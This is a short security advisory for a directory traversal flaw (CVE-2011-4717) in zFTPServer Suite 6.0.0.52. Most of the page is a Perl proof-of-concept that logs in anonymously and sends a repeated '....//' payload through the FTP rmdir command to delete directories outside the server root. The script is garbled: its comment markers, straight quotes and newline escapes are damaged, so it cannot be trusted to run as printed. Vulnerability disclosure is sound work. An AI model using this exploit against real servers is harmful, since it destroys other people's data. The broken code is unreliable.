zFTPServer Suite ‘rmdir’ Directory Traversal Vulnerability

Summary

zFTPServer Suite ‘rmdir’ suffers from directory traversal vulnerability.

Credit:

The information has been provided by Stefan Schurtz.


Details

Vulnerable Systems:
 * zFTPServer Suite 6.0.0.52 ‘

use strict;
use Net::FTP;

my $user = ‘anonymous’;
my $password = ‘anonymous@’;

connect
my $target = $ARGV[0];
my $plength = $ARGV[1];

if (!$ARGV[0]||!$ARGV[1]) {
print ‘[+] Usage: $@ <target> <payload length>n’;
exit 1;
}

my $ftp=Net::FTP->new($target,Timeout=>15) or die ‘Cannot connect to $target: $@’;
print ‘[+] Connected to $targetn’;

login
$ftp->login($user,$password) or die ‘Cannot login ‘, $ftp->message;
print ‘[+] Logged in with user $usern’;

Building payload ‘….//’ with min. length of 38

my @p = ( ”,’.’,’.’,’.’,’.’,’/’,’/’ );
my $payload;

print ‘[+] Building payloadn’;

for (my $i=1;$i<=$plength;$i++) {
$payload .= $p[$i];
push(@p,$p[$i]);
}
sleep(3);

Sending payload
print ‘[+] Sending payload $payloadn’;
$ftp->rmdir($payload) or die ‘rmdir failed ‘, $ftp->message;

disconnect
print ‘[+] Donen’;
$ftp->quit;
exit 0;
#EOF

CVE Information:
2011-4717

Disclosure Timeline:
Published: 2011-12-11

Categories: Exploits